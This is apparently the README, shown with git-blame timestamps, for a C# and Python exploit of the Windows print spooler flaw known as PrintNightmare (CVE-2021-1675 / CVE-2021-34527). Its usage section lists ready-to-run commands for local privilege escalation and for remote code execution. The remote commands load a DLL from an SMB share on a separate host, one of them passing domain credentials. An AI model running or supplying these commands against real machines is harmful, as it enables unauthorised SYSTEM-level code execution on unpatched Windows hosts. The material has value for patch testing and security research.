2021-07-03 11:53:46 +00:00
|
|
|
# C# Implementation of CVE-2021-1675 / CVE-2021-34527
|
2021-07-01 11:45:37 +00:00
|
|
|
|
2021-07-04 14:33:25 +00:00
|
|
|
### Update
|
|
|
|
|
|
|
|
New `CVE-2021-1675.py` has been uploaded which will get the same result as the C# version
|
|
|
|
|
2021-07-04 19:55:28 +00:00
|
|
|
No longer need to manually specify pConfigFile with C# version
|
|
|
|
|
2021-07-01 11:45:37 +00:00
|
|
|
### Usage
|
|
|
|
|
2021-07-03 11:53:46 +00:00
|
|
|
The RCE functionality might need to be executed with local administrator privileges on YOUR machine.
|
|
|
|
|
2021-07-01 11:45:37 +00:00
|
|
|
```
|
2021-07-01 21:30:25 +00:00
|
|
|
#LPE
|
2021-07-01 11:45:37 +00:00
|
|
|
C:\SharpPrintNightmare.exe C:\addCube.dll
|
2021-07-01 21:30:25 +00:00
|
|
|
|
|
|
|
#RCE using existing context
|
2021-07-04 19:55:28 +00:00
|
|
|
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' '\\192.168.1.20'
|
2021-07-01 21:30:25 +00:00
|
|
|
|
|
|
|
#RCE using runas /netonly
|
2021-07-04 19:55:28 +00:00
|
|
|
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' '\\192.168.1.10' hackit.local domain_user Pass123
|
2021-07-01 11:45:37 +00:00
|
|
|
```
|
|
|
|
|
2021-07-01 21:30:25 +00:00
|
|
|
![](../Images/poc4.png)
|
|
|
|
|
2021-07-01 11:45:37 +00:00
|
|
|
![](../Images/poc3.png)
|
2021-07-02 00:13:30 +00:00
|
|
|
|
2021-07-02 00:17:44 +00:00
|
|
|
### Acknowledgements
|
|
|
|
For contributing new ideas or exploit improvements, thanks to
|
2021-07-02 00:13:30 +00:00
|
|
|
* [kiqrx](https://www.hackthebox.eu/home/users/profile/72916)
|